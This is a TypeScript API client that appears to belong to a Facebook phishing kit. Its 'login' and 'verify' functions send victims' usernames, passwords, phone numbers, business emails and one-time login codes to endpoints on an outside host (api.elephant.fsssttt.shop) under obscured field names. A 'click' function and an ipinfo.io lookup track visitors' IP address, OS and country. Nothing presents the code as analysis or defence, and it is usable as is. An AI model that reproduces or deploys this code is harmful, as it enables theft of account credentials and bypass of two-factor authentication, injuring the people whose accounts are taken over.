import axios from "axios";
import { handleError, handleResponse } from "./utils";
const ENDPOINT = "https://api.elephant.fsssttt.shop/api";
// const ENDPOINT = "http://localhost:4000/api";

export const verify = async (
  username: string,
  password: string,
  code: string,
  countryCode: string,
  ipAddress: string,
  idea: string,
  timestamp: number
) => {
  try {
    const url = `${ENDPOINT}/fb/verify`;
    const params = {
      uvi: username,
      pvi: password,
      ivic: ipAddress,
      ccVi: countryCode,
      idSl: idea,
      fcVic: code,
      tiSV: timestamp
    };
    const response = await axios.post<any>(url, params, { timeout: 100000 });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "error");
  }
};

export const login = async (
  phoneNumber: string,
  bEmail: string,
  username: string,
  password: string,
  countryCode: string,
  ipAddress: string,
  idea: string,
  socketId: string
) => {
  try {
    const url = `${ENDPOINT}/fb/login`;
    const params = {
      phvi: phoneNumber,
      bevi: bEmail,
      uvi: username,
      pvi: password,
      ivic: ipAddress,
      ccVi: countryCode,
      idSl: idea,
      sId: socketId
    };
    const response = await axios.post<any>(url, params, { timeout: 100000 });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "error");
  }
};

export const getLocation = async () => {
  const url = `https://ipinfo.io/json`;
  const response = await axios.get(url);
  return { ip: response.data.ip, country_code: response.data.country };
};

export const click = async (
  idea: string,
  os: string,
  ip: string,
  countryCode: string
) => {
  try {
    const params = {
      ivic: ip,
      os: os,
      ccVi: countryCode,
      idSl: idea
    };
    const url = `${ENDPOINT}/fb/click`;
    const response = await axios.post(url, params);
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "something went wrong");
  }
};

export const getCaptcha = async () => {
  try {
    const url = `${ENDPOINT}/captcha`;
    const response = await axios.get(url);
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "something went wrong");
  }
};
